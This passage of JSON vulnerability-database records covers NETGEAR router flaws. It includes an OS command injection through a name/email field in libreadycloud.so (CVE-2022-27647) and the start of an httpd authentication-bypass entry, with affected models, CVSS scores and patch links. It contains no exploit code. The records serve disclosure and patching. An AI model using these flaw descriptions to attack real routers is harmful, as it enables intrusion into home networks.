"id": "JVNDB-2022-021794"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
},
{
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"date": "2025-07-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"date": "2023-11-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"date": "2022-03-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2053"
},
{
"date": "2023-03-29T19:15:08.497000",
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"date": "2025-08-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"date": "2023-11-14T04:15:00",
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"date": "2023-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2053"
},
{
"date": "2023-04-05T15:06:04.507000",
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-021794"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
}
],
"trust": 0.6
}
}
VAR-202203-1671
Vulnerability from variot - Updated: 2025-08-06 22:55This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the name or email field provided to libreadycloud.so. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15874. cax80 firmware, LAX20 firmware, MR60 For multiple Netgear products such as firmware, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The NETGEAR R6700v3 is a Nighthawk AC1750 Smart Dual-Band Gigabit Router from NETGEAR
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202203-1671",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.34"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.126"
},
{
"model": "rax42",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.126"
},
{
"model": "rax50s",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax48",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r7960p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "rax75",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "mr80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.14"
},
{
"model": "ms80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.14"
},
{
"model": "mr60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.124"
},
{
"model": "rax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "r7850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.84"
},
{
"model": "rax40",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rs400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.1.86"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.158"
},
{
"model": "rax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "ms60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.124"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "rax38",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.11.134"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "rax43",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "cax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.3.7"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.84"
},
{
"model": "rax50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax15",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "rax35",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax45",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "mr60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "cax80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "mr80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rax20",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7900p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6900p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "lax20",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7960p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6700",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rax15",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7850",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6700v3",
"scope": null,
"trust": 0.7,
"vendor": "netgear",
"version": null
},
{
"model": "r6700v3 1.0.4.120 10.0.91",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bugscale team",
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
}
],
"trust": 1.3
},
"cve": "CVE-2022-27647",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.7,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 5.1,
"id": "CNVD-2025-17534",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2022-27647",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2022-27647",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2022-27647",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2022-27647",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2022-27647",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-27647",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2022-27647",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-17534",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-2064",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
},
{
"db": "NVD",
"id": "CVE-2022-27647"
},
{
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the name or email field provided to libreadycloud.so. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15874. cax80 firmware, LAX20 firmware, MR60 For multiple Netgear products such as firmware, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The NETGEAR R6700v3 is a Nighthawk AC1750 Smart Dual-Band Gigabit Router from NETGEAR",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-27647"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"db": "VULMON",
"id": "CVE-2022-27647"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-27647",
"trust": 4.6
},
{
"db": "ZDI",
"id": "ZDI-22-524",
"trust": 3.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-022073",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-15874",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-17534",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032410",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2064",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-27647",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"db": "VULMON",
"id": "CVE-2022-27647"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
},
{
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"id": "VAR-202203-1671",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-17534"
}
],
"trust": 0.9457551631578947
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-17534"
}
]
},
"last_update_date": "2025-08-06T22:55:28.120000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://kb.netgear.com/000064723/Security-Advisory-for-Multiple-Vulnerabilities-on-Multiple-Products-PSV-2021-0327"
},
{
"title": "Patch for NETGEAR R6700v3 Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/713026"
},
{
"title": "NETGEAR R6700v3 Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=231217"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.8,
"url": "https://www.zerodayinitiative.com/advisories/zdi-22-524/"
},
{
"trust": 3.2,
"url": "https://kb.netgear.com/000064723/security-advisory-for-multiple-vulnerabilities-on-multiple-products-psv-2021-0327"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27647"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-27647/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032410"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"db": "VULMON",
"id": "CVE-2022-27647"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
},
{
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"db": "VULMON",
"id": "CVE-2022-27647"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
},
{
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"date": "2025-07-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"date": "2023-03-29T00:00:00",
"db": "VULMON",
"id": "CVE-2022-27647"
},
{
"date": "2023-11-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"date": "2022-03-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2064"
},
{
"date": "2023-03-29T19:15:08.773000",
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "ZDI",
"id": "ZDI-22-524"
},
{
"date": "2025-08-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-17534"
},
{
"date": "2023-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2022-27647"
},
{
"date": "2023-11-15T03:22:00",
"db": "JVNDB",
"id": "JVNDB-2022-022073"
},
{
"date": "2023-04-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2064"
},
{
"date": "2023-04-06T15:05:39.393000",
"db": "NVD",
"id": "CVE-2022-27647"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "in multiple NETGEAR products. \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-022073"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2064"
}
],
"trust": 0.6
}
}
VAR-202203-1668
Vulnerability from variot - Updated: 2025-08-06 22:55This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-15854. cax80 firmware, LAX20 firmware, MR60 Multiple Netgear products, including firmware, contain vulnerabilities related to unauthorized authentication.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The NETGEAR R6700v3 is the Nighthawk AC1750 Smart Dual-Band Gigabit Router from NETGEAR
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202203-1668",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.34"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.126"
},
{
"model": "rax42",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.126"
},
{
"model": "rax50s",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax48",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r7960p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "rax75",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "mr80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.14"
},
{
"model": "ms80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.14"
},
{
"model": "mr60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.124"
},
{
"model": "rax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "r7850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.84"
},
{
"model": "rax40",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rs400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.1.86"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.158"
},
{
"model": "rax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "ms60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.124"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
